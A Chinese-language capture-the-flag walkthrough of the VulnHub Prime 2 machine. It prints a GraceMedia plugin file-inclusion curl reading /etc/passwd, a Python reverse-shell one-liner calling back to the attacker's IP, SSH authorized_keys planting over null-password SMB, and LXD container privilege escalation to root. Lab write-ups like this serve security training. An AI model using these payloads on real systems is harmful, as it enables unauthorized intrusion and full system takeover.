prime2

下载地址：https://www.vulnhub.com/entry/prime-2021-2,696/

攻击者IP：192.168.232.129 桥接（自动） vmare

受害者IP：192.168.232.133 仅主机 vxbox

参考文章：https://blog.csdn.net/qwweggfe/article/details/119392903

主机发现

arp-scan -l

端口扫描

nmap -p- -sV 192.168.232.133

web页面

目录扫描

dirsearch -u http://192.168.232.133

有wp的目录，初步判断为wp博客

从10123端口入手，下载文件

查看文件

获得信息，用户名:jarves

.bash_history一般出现在用户的目录下，可以猜测这个路径是"/home/jarves"

shell.php的下载路径是192.168.232.133:10123/upload/shell.php

在/home/jarves/upload/shell.php

wpscan --url http://192.168.232.133/wp/ -e u,ap

u是枚举用户，ap是扫描插件漏洞

获得用户名admin

获得脆弱性插件名gracemedia

查找插件漏洞

searchsploit gracemedia

cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

漏洞验证

curl 'http://192.168.232.133/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd' 

正常的web访问是?cmd=whoami

?换成&会报错

如果是文件包含这个shell.php文件，用？是会报错

但是用&会正常回显

所以

curl 'http://192.168.232.133/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=/home/jarves/upload/shell.php&cmd=id' 

反弹shell

http://192.168.232.133/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=/home/jarves/upload/shell.php&cmd=export RHOST="192.168.232.129";export RPORT=1111;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

反弹成功，python版本3.9

python3 -c "import pty; pty.spawn('/bin/bash')"

发现账号密码

/var/www/html/wp$ cat wp-config.php

root/root

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。

https://blog.csdn.net/qq_63844103/article/details/127219997

enum4linux -A 192.168.232.133

允许使用空密码链接

密码是root/空密码

`smbclient` 是一个用于在命令行上访问 SMB/CIFS 资源的工具。当您执行 `smbclient` 并成功连接到一个共享之后，您将会进入一个有着特定命令集的交互式命令行界面。以下是一些在 `smbclient` 交互式命令行界面下可以使用的常见命令：- `?` 或 `help`：显示所有`smbclient`可用的命令的列表和它们的简短描述。- `ls`：列出当前远程SMB共享的文件和文件夹。- `cd`：更改当前目录到指定的 `directory`。- `pwd`: 显示当前的远程工作目录。- `mkdir`：在远程共享上创建一个新的文件夹。- `rmdir`：删除远程共享上的文件夹。- `get`：从远程共享下载 `file` 到本地机器。- `put`：上传本地 `file` 到远程共享。- `mget`：下载匹配模式的多个文件。- `mput`：上传匹配模式的多个文件。- `rename`：重命名远程共享上的文件或文件夹。- `delete`：删除远程共享上的文件。- `exit` or `quit`：关闭`smbclient`会话并退出程序。请记得，执行这些命令还需要您拥有适当的权限。误用可能会损坏资源或违法。只有当您有合法权利访问目标SMB共享时，您才能使用`smbclient`。

smbclient 

kali创建公钥

ssh-keygen -b 2048

将id_rsa.pub修改为authorized_keys

cp id_rsa.pub authorized_keys 

上传本地的authorized_keys

ssh连接jarves

LXC（Linux Containers）是一种轻量级的虚拟化技术，用于运行多个隔离的Linux系统（容器）在一个控制主机上。与传统的虚拟化技术（如VMware或VirtualBox）相比，LXC通过共享宿主机内核来减少资源开销，提高性能。

主要特点包括：

资源效率：相对于其他虚拟机，比如KVM或Xen，LXC占用的资源更少。启动速度快：LXC容器可以在几秒钟内启动和停止。低开销：LXC分享宿主机的内核而不需要额外的内核启动，这意味着几乎没有虚拟化层面的开销。轻量级隔离：每个容器在进程空间、文件系统等方面与其他容器和宿主系统隔离。

使用LXC, 你可以创建和管理容器的生命周期，比如创建、启动、停止、冻结、复制和销毁容器。也可以针对单独容器配置网络、存储等资源。

lxc:https://blog.csdn.net/L835311324/article/details/84488470

lxc提权：https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

在github上下载Alpine

git clone https://github.com/saghul/lxd-alpine-builder.gitcd /lxd-alpine-builder.git./build-alpine

下载到靶机

wget http://192.168.232.129/alpine-v3.19-x86_64-20231214_2106.tar.gz

lxd init

一直回车

进行查看

lxc image list

导入镜像

lxc image import ./alpine-v3.19-x86_64-20231214_2106.tar.gz --alias alpine

进入到容器

lxc init alpine ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

下载的时候有报错， wget http://192.168.232.129/authorized_keysConnecting to 192.168.232.129 (192.168.232.129:80)

使用echo 传输authorized_keys文件

ssh连接root

ssh [email protected]

原文始发于微信公众号（王之暴龙战神）：prime2